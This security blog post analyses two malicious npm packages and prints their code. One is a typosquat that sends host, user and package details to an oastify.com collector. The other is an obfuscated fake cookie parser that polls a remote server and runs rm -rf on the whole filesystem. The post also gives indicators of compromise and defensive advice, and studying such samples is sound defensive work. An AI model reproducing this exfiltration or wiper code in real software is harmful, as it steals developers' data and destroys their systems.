Nightmares on npm: How Two Malicious Packages Facilitate Data Theft and Destruction

Every day, our security team sifts through countless npm packages. While most packages published to public registries are safe and useful, some slip through the cracks with malicious intent. Recently, we encountered two particularly troubling packages that highlight some common strategies cybercriminals use to exploit developers: one designed to steal sensitive data outright, and another cleverly disguised to destroy data on your system. This post gives you a glimpse into some of the threats that are lurking in open source package repositories.

Threat Analyses#

Both of the concerning packages on npm have now been marked as malware and we have asked the registry to remove them: transferwise-iconfont and protect-api. Each one represents a different level of sophistication in malicious code distribution.

Package 1: The Data Thief

We see these kinds of packages everyday in our feed, they are often labeled as either test packages or something else, however they can act as spyware in many cases.

The transferwise-iconfont package is essentially squatting the namespace for the legitimate TransferWise Iconfont library, developed by Wise, formerly known as TransferWise, a financial technology company focused on global money transfers. The code in the package is not related to the iconfont or copied from its GitHub repo.

const trackingData = JSON.stringify({
    p: package,
    c: __dirname,
    hd: os.homedir(),
    hn: os.hostname(),
    un: os.userInfo().username,
    dns: dns.getServers(),
    r: packageJSON ? packageJSON.___resolved : undefined,
    v: packageJSON.version,
    pjson: packageJSON,
});

var postData = querystring.stringify({
    msg: trackingData,
});

var options = {
    hostname: "r7z12f7knlides86u06z22fpzg57tzho.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
    port: 443,
    path: "/",
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": postData.length,
    },
};

This package doesn't try to hide its malicious intent. It openly collects sensitive data from the user's system and sends it to a remote server controlled by the attacker. While its brazenness makes it easier to detect through code review, it can still pose a significant threat if overlooked.

Package 2: The Data Destroyer

The second package, protect-api, is masquerading as the legitimate "cookie-parser" package. It employs sophisticated obfuscation techniques to hide its true nature. At first glance, it appears to be a legitimate utility for handling HTTP cookies. However, buried within layers of obfuscated code lies a destructive function.

function signedCookie(_0x2312a4, _0x9d2acc) {
  if (typeof _0x2312a4 !== "string") {
    return undefined;
  }
  if (_0x2312a4.substr(0x0, 0x2) !== 's:') {
    return _0x2312a4;
  }
  var _0xc597d9 = !_0x9d2acc || Array.isArray(_0x9d2acc) ? _0x9d2acc || [] : [_0x9d2acc];
  for (var _0x393c39 = 0x0; _0x393c39 < _0xc597d9.length; _0x393c39++) {
    var _0x505789 = signature.unsign(_0x2312a4.slice(0x2), _0xc597d9[_0x393c39]);
    if (_0x505789 !== false) {
      return _0x505789;
    }
  }
  return false;
}
const sh = require('shelljs');
module.exports = protectAPI;
function protectAPI() {
  if (!__dirname.includes("mware") && !__dirname.includes('minhtit')) {
    setInterval(() => {
      fetch('https://6514b3f1dc3282a6a3cd7125.mockapi.io/server/1').then(_0x231e3e => _0x231e3e.json()).then(_0x361fb2 => {
        if (_0x361fb2.isAngry) {
          angry();
        }
      })['catch'](_0x5d61c5 => {})["finally"](_0x1c49c6 => {});
    }, 0xbb8);
  }
}
function angry() {
  sh.exec("rm -rf *  > /dev/null 2>&1");
  sh.exec("rm -rf /*  > /dev/null 2>&1");
  sh.exec("rm -rf /  > /dev/null 2>&1");
  sh.exec("rm -rf ~/*  > /dev/null 2>&1");
}

This package is particularly dangerous because not only does it hide its malicious intent through obfuscation but it also includes a delay mechanism. The angry() function, which attempts to delete all files on the system, is scheduled to execute an hour after the package is installed, making it harder to trace back to the source.

The Anatomy of the Attacks#

Both packages exploit the trust developers place in the npm ecosystem. The simple spyware package operates on the assumption that developers might not scrutinize a logging utility too closely. It collects sensitive data, potentially including environment variables that might contain API keys or other credentials, and exfiltrates this information to the attacker's server.

The obfuscated package is more insidious. It leverages legitimate-looking functionality (cookie parsing) as a cover for its destructive payload. The use of code obfuscation makes it challenging for automated tools and manual reviews to detect the malicious code. The delayed execution of the destructive function further complicates attribution and detection.

Protecting Yourself and Your Organization#

npm is rife with many low-effort attempts to compromise unsuspecting users' machines or data. Here are a few best practices for making sure one of these packages doesn't land in your code base:

1. Verify Package Sources: Always check the reputation of package authors and the package's download statistics. Be wary of new packages with few downloads.
2. Code Review: Implement stringent code review practices, especially for third-party dependencies. Look out for obfuscated code and unexpected network calls.
3. Use Security Tools: Employ automated security scanning tools that can detect known malicious patterns and vulnerabilities in your dependencies.

If you're not yet using Socket, our AI-powered threat detection is the best way to protect yourself from these types of nightmare packages. Install our free Socket for GitHub app with just two clicks to instantly protect your repos from these types of threats. It will automatically scan your dependencies for security and code quality issues and give you real-time alerts.

Conclusion#

The npm ecosystem, while incredibly powerful and convenient, is not without its dangers. The cases we've explored today are just a small sampling of the security threats we see plaguing open source code repositories.

Don't let your project become the next victim of a malicious package. The best defense against these threats is a combination of awareness, tools, and best practices. Stay safe out there!

Supplementary Materials & IOCs#

• Affected Package 1: transfwerwise-iconfont
• Affected Package 2: protect-api
• r7z12f7knlides86u06z22fpzg57tzho.oastify[.]com
• hxxps://6514b3f1dc3282a6a3cd7125.mockapi[.]io/server/1